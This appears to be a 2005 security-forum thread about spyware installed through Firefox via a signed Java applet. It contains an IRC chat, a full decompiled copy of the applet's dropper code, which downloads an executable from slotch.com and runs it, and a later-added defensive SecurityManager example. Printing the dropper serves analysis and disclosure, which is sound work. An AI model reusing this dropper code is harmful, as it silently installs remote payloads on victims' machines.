Post #1 (Coyote), Mar 4 2005, 10:10 AM
AntiSlyware.com; Group: Malware Expert; Posts: 984; Joined: 10-May 03; From: Great Country Of Texas; Member No.: 5; Operating System: ...
If you want to point someone at this post: http://TomCoyote.org/Theory/ ; that link will bring you here.

My apologies if anyone takes anything said against their browser, their surfing, their computer, their dogs or their cats; this is just a conversation that needs to be thought about.

[ 09:39:25 ] [ @Efwis ] I had fun the other night, was surfing the web for a neildiamond song, got nailed with a major hijacking
[ 09:39:33 ] [ @Efwis ] *Neil Diamond
[ 09:39:43 ] [ @Coyote` ] neil will do that to you
[ 09:39:54 ] [ @Coyote` ] go with Pink Floyd next time
[ 09:40:45 ] [ @Efwis ] heh, hit me with 180solutions, l2m, 10 viruses 2 trojan downloaders, a java exploit, and a homepage hijack, went right around Moz and nailed IE
[ 09:40:46 ] [ @Coyote` ] it's a crying shame that no one is safe looking for things nowadays
[ 09:41:12 ] [ @Efwis ] oh I forgot ISTVbar and sidesearch
[ 09:41:41 ] [ @Coyote` ] let's say you have IE secure, and you use another browser
[ 09:42:31 ] [ @Coyote` ] this other browser allows something to happen that bypasses the first block you have built into IE say Iespyads, thus IE is now a target again through this other browser
[ 09:42:44 ] [ @Coyote` ] this IS just a theory btw
[ 09:42:51 ] [ @Coyote` ] but it is possible
[ 09:43:31 ] [ @Coyote` ] now if you go to that same site in IE, nothing happens because your first block stopped it
[ 09:43:45 ] [ @Efwis ] I looked in my IE_Spyad files, this page isn't even listed, although it should be, I think I will contact Eric Howes and he can add it to his next update
[ 09:44:11 ] [ @Coyote` ] are you in the classroom?
[ 09:44:18 ] [ @Efwis ] yeah, your theory has merit and is probably quite accurate
[ 09:44:22 ] [ @Efwis ] yes I am
[ 09:44:32 ] [ @Coyote` ] have you been keeping up with wng_z3r0's problem that I have posted to?
[ 09:44:45 ] [ @Efwis ] no, got a link?
[ 09:44:53 ] [ @Coyote` ] http://forums.tomcoyote.org/index.php?act=...ndpost&p=137765
[ 09:45:08 ] [ @Coyote` ] took 4 pages of posts to finally get to the root of the problem
[ 09:45:26 ] [ @Efwis ] looking
[ 09:45:41 ] [ @Coyote` ] his shell browser covering IE allowed something IE wouldn't
[ 09:46:31 ] [ @Coyote` ] not so much a theory anymore
[ 09:48:00 ] [ @bozodog ] are you saying that Mozilla can let stuff through to IE and beyond?
[ 09:48:50 ] [ @Coyote` ] I am not saying anything about moz, I am saying it is a possibility that an alternate browser can let things bypass to IE and therefore cause problems
[ 09:49:44 ] [ @Coyote` ] and by them bypassing to IE, IE's protections can be bypassed that normally wouldn't if IE was in use instead of the alternate
[ 09:50:29 ] [ @bozodog ] err.. I think I understand
[ 09:51:01 ] [ @Coyote` ] it's like a layer effect, you have layers of protections you set in place, using an alternate browser, you can possibly bypass a layer or two which in turn can lead to your being infected
[ 09:51:36 ] [ @Coyote` ] it may not go in the front door but it might find a side window
[ 09:51:37 ] [ @bozodog ] Ahh..
[ 09:52:45 ] [ @Coyote` ] I won't say that it is possible with any particular browser, I think in fact it may be possible with any browser
[ 09:53:03 ] [ @Coyote` ] but this is only theory at this point
[ 09:53:24 ] [ @Coyote` ] some script kiddie will strive to make it happen on a regular basis eventually
[ 09:54:10 ] [ @bozodog ] sounds like a solid thought... they are getting better at mucking up our systems..
[ 09:54:36 ] [ @Coyote` ] well, the problem itself goes back to windows,
[ 09:54:53 ] [ @Coyote` ] windows is made to accommodate users of limited knowledge
[ 09:55:06 ] [ @bozodog ] but doesn't your AV, etc... do its job in that case?
[ 09:55:09 ] [ @Coyote` ] so that in itself is preyed upon by the kiddies
[ 09:55:36 ] [ @Coyote` ] AV is only one part of an overall solution and it lacks a great deal of the overall protection
[ 09:56:07 ] [ @Coyote` ] the AV chosen also plays a part in how that is defined
[ 09:56:42 ] [ @Coyote` ] several AV's have weak real time scanning engines that fail at the sight of any infection
[ 09:57:15 ] [ @Coyote` ] real time scanning engines are the only way to truly combat virus and trojans
[ 09:57:28 ] [ @bozodog ] I only use Avast free... and spywareblaster etc..
[ 09:57:42 ] [ @Coyote` ] I have not tried Avast
[ 09:57:51 ] [ @Coyote` ] so I cannot comment on it
[ 09:58:27 ] [ @bozodog ] it sure updates often, (2-3 times a day at times)
[ 09:58:51 ] [ @Coyote` ] I hope that is because they are adding to the database and not correcting mistakes
[ 09:58:58 ] [ @bozodog ] and scares the heck outa me when some baddie tries to get in
[ 09:59:15 ] [ @bozodog ] yeah, it's data
[ 09:59:34 ] [ @Coyote` ] well, you can't tell from the updating
[ 09:59:53 ] [ @Coyote` ] you would have to dissect each dataflow
[ 10:00:03 ] [ @Coyote` ] and know what coding they use
[ 10:00:51 ] [ @Efwis ] from looking at that post, I would say you are correct Tom, no longer a theory but a proven fact
[ 10:01:15 ] [ @bozodog ] of course I don't surf the back alleys, or p2p stuff
[ 10:01:24 ] [ @Coyote` ] well, fact for his situation, theory for other browsers at this point
[ 10:01:52 ] [ @Coyote` ] bozodog look at what happened to Efwis looking for a neil diamond song
[ 10:01:59 ] [ @Efwis ] based on what happened to me its a fact for Moz too
[ 10:02:01 ] [ @bozodog ] yep
[ 10:02:30 ] [ @bozodog ] do you use Moz or FF?
[ 10:02:31 ] [ @Coyote` ] I hate it when I am correct about some of these theories but I am right too many times
[ 10:02:48 ] [ @Efwis ] I went there with my IE yesterday, nothing happened, all my protections worked correctly
[ 10:03:13 ] [ @bozodog ] you're like a hound dog.. you can sniff out problems
[ 10:03:13 ] [ @Efwis ] so I am inclined to believe it is something actually programmed into the html code
[ 10:03:40 ] [ @Efwis ] he is good at what he does, and I like his info, because he usually is correct bd
[ 10:04:23 ] [ @bozodog ] don't I know it... he knows I have the highest respect for what he says
Post #2 (rob_), Mar 14 2005, 11:43 AM
New Member; Group: Authentic Member; Posts: 10; Joined: 14-March 05; Member No.: 27,723; Operating System: several, WinME, XP, SuSE, Eros
QUOTE("Mike"): And I'd like to point out that Java did just what it is designed to do when an applet attempts to bypass the security sandboxing, it popped a very plainly worded security warning that the applet is using an unverified certificate from an untrusted company.

Here is the certificate warning, courtesy of another user from another board:

[certificate warning screenshot]

Now, nothing in that certificate says that the applet wishes to download a PE file (native executable binary) into the Windows temporary directory and then execute it. So I would respectfully disagree that the average user (98% of them) would worry much about this particular warning. For the simple reason that, most people who have any concept of what Java is, have also assimilated the common, if erroneous, notion that Java applets only run inside of a "security sandbox".

I personally believe that people really shouldn't have to worry about whether a piece of Java code has been signed or not when such code is executed from the context of a browser. Now, if someone wants to download a Java applet and start it up from the command line, and wishes to grant it complete authority to trash their system, that's their prerogative. But unless the Firefox team wants Java to get the same evil reputation as ActiveX, they should work with Sun to figure out how to constrain Java calls to File.createTempFile() and Runtime.exec() and provide users with a default false setting to new options in about:config, for example "java.allow.runtime.exec" and "java.allow.file.createtempfile". This would "solve" the problem for 98% of the user community.

Thanks Paperghost for finding my little post in the blizzard of comments on your site. Had you not posted about the exploit, I wouldn't have read about it on theregister.co.uk.

Here is the rest of the decompiled jar file. Please notice that all of the malware installation is done by the PE executable that the Java applet downloads and runs, and is not done directly by the Java applet itself. Please also note that the downloaded PE file could have been any sort of payload (virus, worm, trojan, rootkit, whatever), and thus offers a vector against Firefox itself.

Cheers.

CODE
```java
// Decompiled by "rob"
// Source File Name: InstallerApplet.java

package javainstaller;

import java.applet.Applet;
import java.awt.*;
import java.io.*;
import java.net.*;

public class InstallerApplet extends Applet {

    // Applet parameter lookup; falls back to system properties when run standalone
    public String getParameter(String s, String s1) {
        return isStandalone ? System.getProperty(s, s1)
                            : getParameter(s) == null ? s1 : getParameter(s);
    }

    // Reads the whole remote file into memory
    public ByteArrayOutputStream downloadFile(String s) throws IOException {
        URL url1 = new URL(s);
        InputStream inputstream = url1.openStream();
        if (inputstream == null)
            throw new IOException("the stream of the connection was null");
        byte abyte0[] = new byte[26384];
        ByteArrayOutputStream bytearrayoutputstream = new ByteArrayOutputStream();
        for (int i = 0; i != -1;) {
            i = inputstream.read(abyte0, 0, 26384);
            if (i != -1)
                bytearrayoutputstream.write(abyte0, 0, i);
        }
        if (inputstream != null)
            inputstream.close();
        return bytearrayoutputstream;
    }

    // Writes the buffered download to disk and returns its absolute path
    public String saveFile(ByteArrayOutputStream bytearrayoutputstream, File file) throws IOException {
        FileOutputStream fileoutputstream = new FileOutputStream(file);
        fileoutputstream.write(bytearrayoutputstream.toByteArray());
        if (fileoutputstream != null)
            fileoutputstream.close();
        return file.getAbsolutePath();
    }

    public InstallerApplet() {
        isStandalone = false;
        url = "http://www.slotch.com/ist/softwares/v4.0/istdownload.exe";
        app = "iinstall";
        vmcZV9HHQsT = "bk5CaeGOco7CU7rSfX7U2LxsptOacuqwyEaNRfRVle7M8NYegXGftdPyBrGAbdGNJ8RCac";
        vGDI5wuEjJQxI = "9G7ftFBBGpnnwP1v4BWeyp";
        vDjMcU3yvG = "lx1E039A5SF7OnBOGOdWT4gOJ52kfceX59iGRAQPxCK4GSEWEbv";
    }

    public void init() {
        try {
            account_id = getParameter("account_id", "");
            download_key = getParameter("download_key", "");
            download_lock = getParameter("download_lock", "");
            cfg = getParameter("cfg", "");
            sub = getParameter("sub", "");
        } catch (Exception exception) {
            exception.printStackTrace();
        }
        try {
            jbInit();
        } catch (Exception exception1) {
            exception1.printStackTrace();
        }
    }

    // The two calls singled out above: a temp file is created, the PE is
    // written into it, and it is then executed with the applet parameters
    // passed along as command-line switches.
    private void jbInit() throws Exception {
        File file = File.createTempFile(app, ".exe");
        ByteArrayOutputStream bytearrayoutputstream = downloadFile(url);
        if (bytearrayoutputstream == null)
            throw new IOException("downloading was failed");
        String s = saveFile(bytearrayoutputstream, file);
        bytearrayoutputstream.close();
        String s1 = "";
        if (account_id != null && account_id.length() > 0)
            s1 = s1 + " /aid:" + account_id;
        if (download_key != null && download_key.length() > 0)
            s1 = s1 + " /key:" + download_key;
        if (download_lock != null && download_lock.length() > 0)
            s1 = s1 + " /lock:" + download_lock;
        if (cfg != null && cfg.length() > 0)
            s1 = s1 + " /cfg:" + cfg;
        if (sub != null && sub.length() > 0)
            s1 = s1 + " /sub:" + sub;
        Runtime.getRuntime().exec(file.getAbsolutePath() + s1);
    }

    public String getAppletInfo() {
        return "Applet Information";
    }

    public String[][] getParameterInfo() {
        String as[][] = {
            { "param1", "String", "" },
            { "download_key", "String", "" },
            { "download_lock", "String", "" }
        };
        return as;
    }

    // Not called from the applet itself. The labelled block and the unused
    // "obj" are decompiler artifacts; note also that the copy loop writes the
    // whole 1000-byte buffer regardless of how many bytes were read.
    public static void downloadApp(String s, File file) {
        label0: {
            Object obj = null;
            if (s == null)
                break label0;
            HttpURLConnection httpurlconnection = null;
            try {
                try {
                    URL url1 = new URL(s);
                    httpurlconnection = (HttpURLConnection) url1.openConnection();
                    httpurlconnection.setRequestMethod("POST");
                    httpurlconnection.setDoInput(true);
                    httpurlconnection.setDoOutput(true);
                    httpurlconnection.setUseCaches(false);
                    httpurlconnection.setAllowUserInteraction(true);
                    HttpURLConnection.setFollowRedirects(true);
                    httpurlconnection.setInstanceFollowRedirects(true);
                    InputStream inputstream = null;
                    FileOutputStream fileoutputstream = null;
                    try {
                        inputstream = httpurlconnection.getInputStream();
                        fileoutputstream = new FileOutputStream(file);
                        byte abyte0[] = new byte[1000];
                        try {
                            while (inputstream.read(abyte0) > 0)
                                fileoutputstream.write(abyte0);
                        } catch (IOException ioexception2) {
                            System.err.println(ioexception2);
                        }
                    } catch (IOException ioexception1) {
                    } finally {
                        if (fileoutputstream != null)
                            fileoutputstream.close();
                        if (inputstream != null)
                            inputstream.close();
                    }
                } catch (MalformedURLException malformedurlexception) {
                    System.out.print("The URL was malformed: " + malformedurlexception.getMessage());
                    break label0;
                } catch (IOException ioexception) {
                    System.out.print("The URL caused an IO Exception: " + ioexception.getMessage());
                    break label0;
                }
                break label0;
            } finally {
                if (httpurlconnection != null)
                    httpurlconnection.disconnect();
            }
        }
    }

    // Standalone launcher: a 1x1 frame centred on screen, parameters read from system properties
    public static void main(String args[]) {
        InstallerApplet installerapplet = new InstallerApplet();
        installerapplet.isStandalone = true;
        Frame frame = new Frame();
        frame.setTitle("Applet Frame");
        frame.add(installerapplet, "Center");
        installerapplet.init();
        installerapplet.start();
        frame.setSize(1, 1);
        Dimension dimension = Toolkit.getDefaultToolkit().getScreenSize();
        frame.setLocation((dimension.width - frame.getSize().width) / 2,
                          (dimension.height - frame.getSize().height) / 2);
        frame.setVisible(true);
    }

    private boolean isStandalone;
    public static final int BUFFER_SIZE = 26384;
    String url;
    String app;
    String account_id;
    String download_key;
    String download_lock;
    String cfg;
    String sub;
    String vmcZV9HHQsT;
    String vGDI5wuEjJQxI;
    String vDjMcU3yvG;
}
```

This post has been edited by rob_: Mar 14 2005, 11:47 AM
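A defender-side illustration of the constraint rob_ proposes above, added here as an example and not code from the thread, from Sun or from Mozilla: a custom SecurityManager that denies exactly the two operations the decompiled applet depends on (temp-file creation via File.createTempFile and process launch via Runtime.exec) while leaving everything else permitted, then replays those two calls to show the result. The class name AppletCallGuard and its two switches are assumptions modelled on the suggested "java.allow.file.createtempfile" and "java.allow.runtime.exec" keys; note that SecurityManager was deprecated for removal in Java 17 (JEP 411) and, from Java 18 on, System.setSecurityManager only works when the JVM is started with -Djava.security.manager=allow.

```java
import java.io.File;
import java.io.IOException;
import java.security.Permission;

/**
 * Added example (not the applet's or any vendor's code): deny the two hooks
 * the dropper pattern relies on. The switch names are assumptions mirroring
 * rob_'s proposed about:config options.
 */
public class AppletCallGuard extends SecurityManager {
    private final boolean allowExec;       // "java.allow.runtime.exec"
    private final boolean allowTempWrite;  // "java.allow.file.createtempfile"
    private final String tmpDir =
        new File(System.getProperty("java.io.tmpdir")).getAbsolutePath();

    public AppletCallGuard(boolean allowExec, boolean allowTempWrite) {
        this.allowExec = allowExec;
        this.allowTempWrite = allowTempWrite;
    }

    // Permissive baseline so the demo itself can run; only the hooks below deny.
    @Override public void checkPermission(Permission perm) { }
    @Override public void checkPermission(Permission perm, Object ctx) { }

    // Reached from Runtime.getRuntime().exec(...) via ProcessBuilder.start()
    @Override public void checkExec(String cmd) {
        if (!allowExec)
            throw new SecurityException("exec blocked: " + cmd);
    }

    // Reached from File.createTempFile(...), which calls checkWrite on the candidate path
    @Override public void checkWrite(String file) {
        if (!allowTempWrite && new File(file).getAbsolutePath().startsWith(tmpDir))
            throw new SecurityException("write to temp dir blocked: " + file);
    }

    /** Replays the applet's two key calls and reports which ones were stopped. */
    public static String[] replay() {
        String[] outcome = new String[2];
        try {
            File f = File.createTempFile("iinstall", ".exe"); // same prefix/suffix as jbInit()
            f.delete();
            outcome[0] = "createTempFile allowed";
        } catch (SecurityException e) {
            outcome[0] = "createTempFile denied";
        } catch (IOException e) {
            outcome[0] = "createTempFile failed: " + e.getMessage();
        }
        try {
            Runtime.getRuntime().exec(new String[] { "hostname" }); // harmless stand-in command
            outcome[1] = "exec allowed";
        } catch (SecurityException e) {
            outcome[1] = "exec denied";
        } catch (IOException e) {
            outcome[1] = "exec attempted but failed: " + e.getMessage();
        }
        return outcome;
    }

    public static void main(String[] args) {
        // Both switches off: the default-false setting rob_ argues for.
        System.setSecurityManager(new AppletCallGuard(false, false));
        for (String line : replay())
            System.out.println(line);
    }
}
```

With both switches false the replay reports "createTempFile denied" and "exec denied"; flipping either constructor argument to true lets that single call through, which is the granularity the proposed options would give a user.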
Coyote: Theory (Mar 4 2005, 10:10 AM)
Efwis: The below log was generated from a machine that wen... (Mar 4 2005, 06:18 PM)
shelf life: Efwis, can you post a link to the website (Mar 4 2005, 08:21 PM)
wng_z3r0: if such a theory were true, is there a way to ... (Mar 5 2005, 01:57 AM)
Coyote: this go over your head? the problem is not IE, if... (Mar 5 2005, 04:58 AM)
wng_z3r0: QUOTE(Coyote @ Mar 5 2005, 04:58 AM) IE is i... (Mar 5 2005, 10:13 AM)
Efwis: QUOTE(shelf life @ Mar 4 2005, 08:21 PM) Efwis... (Mar 5 2005, 06:45 AM)
harpwolf: QUOTE(Efwis @ Mar 5 2005, 05:45 AM) QUOTE(shel... (Mar 13 2005, 04:09 PM)
ChrisRLG: Efwis, Has Jeff got his computer clean now - (Its ... (Mar 5 2005, 10:10 AM)
Besttechie: Hey Everyone, As you can see from the log Efwis p... (Mar 5 2005, 10:37 AM)
insipid: QUOTE(Besttechie @ Mar 5 2005, 08:37 AM) Now,... (Mar 5 2005, 11:15 AM)
Coyote: It is always your choice as to what to use, I have... (Mar 5 2005, 01:05 PM)
Coyote: This is a js file that was called to from the link... (Mar 5 2005, 07:39 PM)
herbalist: Efwis, Do you happen to know which version of Fire... (Mar 6 2005, 04:34 AM)
helpless: I can say at work using other browsers then MSIE i... (Mar 6 2005, 05:42 AM)
Efwis: QUOTE(herbalist @ Mar 6 2005, 04:34 AM) Efwis,... (Mar 6 2005, 08:06 AM)
Racktracker: Efwis was "kind" enough to send me the l... (Mar 6 2005, 11:19 AM)
Crow: hmm.... my log after visiting with FF Logfile... (Mar 6 2005, 12:37 PM)
dknoppix: All that I'm hoping is that there isn't an... (Mar 6 2005, 07:42 PM)
RubbeR DuckY: Me thinks they were planning this. Yes, funny adve... (Mar 7 2005, 05:30 PM)
Paperghost: They're doing this by exploiting the Sun java runti... (Mar 9 2005, 06:37 PM)
Paperghost: I've had an update from Daniel Veditz, head of... (Mar 10 2005, 12:09 AM)
Coyote: Paperghost thank you for your work on this (Mar 10 2005, 12:19 AM)
Pipex: have highlighted the unfortunate news on my forum ... (Mar 10 2005, 02:10 AM)
LostAccount: Just did a google search on the site. Found it...b... (Mar 10 2005, 11:20 AM)
Hound5150: I have not been able to test much of this but if y... (Mar 10 2005, 11:21 AM)
Paperghost: http://www.theregister.co.uk/2005/03/11/al...tive_... (Mar 11 2005, 11:40 AM)
Hound5150: This was a thought that I had after reading an art... (Mar 11 2005, 01:27 PM)
grummy: After reading this thread I couldn't resist go... (Mar 11 2005, 07:22 PM)
Racktracker: If you look at my screen shot you can see the ... (Mar 11 2005, 08:23 PM)
grummy: RackTracker, I now see that both our browsers reac... (Mar 11 2005, 08:40 PM)
grummy: I just looked in Control Panel and opened the up Ja... (Mar 11 2005, 09:00 PM)
Paperghost: Some people have said that this only affects older... (Mar 12 2005, 05:36 AM)
Paperghost: Funnily enough, "Java/JavaOpenStream" ha... (Mar 12 2005, 06:11 AM)
Mike: Guys, this is not a browser problem. This is a Jav... (Mar 12 2005, 02:07 PM)
Paperghost: Actually, it IS a browser problem in that the brow... (Mar 12 2005, 03:47 PM)
mpfeif101: Check out Mike's newsletter... well said: htt... (Mar 13 2005, 10:59 AM)
Paperghost: QUOTE My frustration with this is that people are c... (Mar 13 2005, 11:25 AM)
Racktracker: If people were being infected without warning via ... (Mar 13 2005, 01:15 PM)
Efwis: I should point out, and this by no means goes agai... (Mar 13 2005, 01:18 PM)
Racktracker: I'm not sure of the circumstances in Efwis... (Mar 13 2005, 02:33 PM)
southernlady: I was reading paperghost's site and then went ... (Mar 13 2005, 09:12 PM)
EVApilot: You'll be glad to know that the applets fail o... (Mar 14 2005, 10:41 AM)
The Computer Valet: QUOTE(rob_ @ Mar 14 2005, 12:43 PM) So I would... (Mar 14 2005, 09:16 PM)
Paperghost: Excellent post, Rob (Mar 14 2005, 01:24 PM)
Avohir: you know... it strikes me that if this is an explo... (Mar 14 2005, 01:54 PM)
rob_: slotch.com, is the canadian firm sending this ... (Mar 14 2005, 01:59 PM)
Efwis: actually harpwolf works for Yahoo, contacted me by... (Mar 14 2005, 02:22 PM)
rob_: Ah, good to know. If I had permission to edit my ... (Mar 14 2005, 03:15 PM)
Efwis: ask and ye shall receive, you want it edited rob? (Mar 14 2005, 03:16 PM)
rob_: Aye that would be great. Thanks. (Mar 14 2005, 03:20 PM)
rob_: Here are a couple more choice quotations from Inte... (Mar 14 2005, 04:47 PM)
Paperghost: That's....a very good question Rob. Now I'm REALLY g... (Mar 14 2005, 05:03 PM)
rob_: QUOTE(The Computer Valet) You can call these people... (Mar 15 2005, 09:14 AM)
southernlady: QUOTE the bulk of the Firefox user base shouldn... (Mar 15 2005, 10:05 AM)
rob_: QUOTE(southernlady) That actually should read ANY u... (Mar 15 2005, 11:39 AM)
southernlady: QUOTE IE doesn't interest me because I don... (Mar 16 2005, 07:07 AM)
rob_: QUOTE if you use a Windows product, you use IE even... (Mar 16 2005, 05:25 PM)
The Computer Valet: QUOTE(rob_ @ Mar 16 2005, 06:25 PM) Anyway, I ... (Mar 16 2005, 09:35 PM)
aad: As a newbie to this forum but not a newbie to secu... (Mar 17 2005, 01:19 AM)
rob_: QUOTE To wit: You MUST click YES to continue. To w... (Mar 17 2005, 09:41 AM)
Blacksheep: Hmm after perusing the various posts, rants, ruffl... (Mar 17 2005, 10:21 AM)
Zero: QUOTE(Blacksheep @ Mar 17 2005, 12:21 PM) 2. I... (Mar 17 2005, 03:28 PM)
aad: QUOTE(Zero @ Mar 17 2005, 09:28 PM) QUOTE(Blac... (Mar 17 2005, 03:57 PM)
Zero: Funny. I don't recall saying anything about Linux, ... (Mar 17 2005, 04:07 PM)
Blacksheep: Many newbies are unaware of the consequences of cl... (Mar 17 2005, 06:28 PM)
Galadriel: Whether it works on Linux or not, has nothing to d... (Mar 17 2005, 06:52 PM)
rob_: @ ZERO LOL Well, you will all be relieved for thi... (Mar 17 2005, 07:00 PM)
Zero: I stand by what I said. If a user fails to see tha... (Mar 17 2005, 07:08 PM)
Paperghost: "I stand by what I said. If a user fails to s... (Mar 18 2005, 12:28 AM)
Zero: Alright, done, demoted. Now as per your post: Ge... (Mar 18 2005, 01:24 AM)
Paperghost: QUOTE "Nowhere in the applet does it say anyth... (Mar 18 2005, 01:40 AM)
Zero: "Your insistence on saying this "isnt" a... (Mar 18 2005, 01:51 AM)
Efwis: QUOTE Its not an exploit, it never was an exploit, ... (Mar 18 2005, 07:28 AM)
Zero: "2 : to make use of meanly or unjustly for on... (Mar 18 2005, 10:40 AM)
Paperghost: QUOTE(Zero @ Mar 18 2005, 07:51 AM) Kevin Mitn... (Mar 18 2005, 12:23 PM)
aad: I will add that the exploit WOULD work on Linux. T... (Mar 18 2005, 12:29 PM)
Avohir: I wouldn't touch this debate with a 10 foot po... (Mar 18 2005, 12:30 PM)
Zero: "...and that proves the validity of your argu... (Mar 18 2005, 01:15 PM)
Paperghost: ...which proves you can't possibly work (in ... (Mar 18 2005, 02:04 PM)
Zero: "...which proves you can't possibly work ... (Mar 18 2005, 02:30 PM)
Paperghost: "There is a difference between WINE and LINUX... (Mar 18 2005, 02:42 PM)
Zero: "Which doesnt really make your point any clea... (Mar 18 2005, 02:56 PM)
Paperghost: QUOTE Zero: Yes. I ran the exploit under linux noth... (Mar 18 2005, 03:17 PM)
Zero: "And yet in the above statement you are defin... (Mar 18 2005, 04:23 PM)
aad: PaperGhost: Yes, I have to totally agree. I still... (Mar 18 2005, 04:35 PM)
Paperghost: An interesting find re proxies...haven't tested tha... (Mar 18 2005, 04:39 PM)
aad: QUOTE(Paperghost @ Mar 18 2005, 10:39 PM) An i... (Mar 18 2005, 05:23 PM)
Paperghost: One small thing that everybody is missing on this ... (Mar 19 2005, 01:03 PM)
Avohir: correct me if I'm wrong here... but unless you... (Mar 19 2005, 03:43 PM)
Zero: News flash: visiting sites stores files in your cac... (Mar 19 2005, 05:45 PM)
Paperghost: Zero, once again you've missed the point compl... (Mar 20 2005, 04:22 AM)
southernlady: QUOTE After all, I'm willing to bet theres a sl... (Mar 20 2005, 07:31 AM)
Paperghost: QUOTE(southernlady @ Mar 20 2005, 01:31 PM) An... (Mar 20 2005, 09:06 AM)
nlinecomputers: This has had so many responses in the past few day... (Mar 20 2005, 10:57 AM)
Zero: "Zero, once again you've missed the point... (Mar 20 2005, 11:25 AM)
Paperghost: Zero, if you're happy to leave crud - any crud... (Mar 20 2005, 02:36 PM)
Zero: And that's why every PC I fix I give them a co... (Mar 20 2005, 02:44 PM)
Siggyx: Play nice everyone. (Mar 20 2005, 02:48 PM)